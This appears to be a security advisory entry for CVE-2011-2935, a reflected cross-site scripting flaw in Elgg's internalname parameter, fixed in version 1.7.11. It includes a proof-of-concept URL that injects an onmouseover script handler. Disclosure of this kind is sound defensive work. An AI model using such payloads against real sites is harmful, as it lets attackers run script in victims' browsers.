GHSA-mcfm-j5g6-w26f

Suggest an improvement
Source
https://github.com/advisories/GHSA-mcfm-j5g6-w26f
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-mcfm-j5g6-w26f/GHSA-mcfm-j5g6-w26f.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-mcfm-j5g6-w26f
Aliases
  • CVE-2011-2935
Published
2022-04-22T00:24:11Z
Modified
2024-01-12T22:26:37.605394Z
Severity
  • 6.1 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVSS Calculator
Summary
Elgg Reflected XSS Vulnerability
Details

VULNERABILITY DESCRIPTION

The internalname parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser

PROOF-OF-CONCEPT/EXPLOIT

http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
Database specific
{
    "nvd_published_at": "2019-11-12T14:15:00Z",
    "cwe_ids": [
        "CWE-79"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-12T22:05:22Z"
}
References

Affected packages

Packagist / elgg/elgg

Package

Name
elgg/elgg
Purl
pkg:composer/elgg/elgg

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.7.11

Database specific

{
    "last_known_affected_version_range": "<= 1.7.10"
}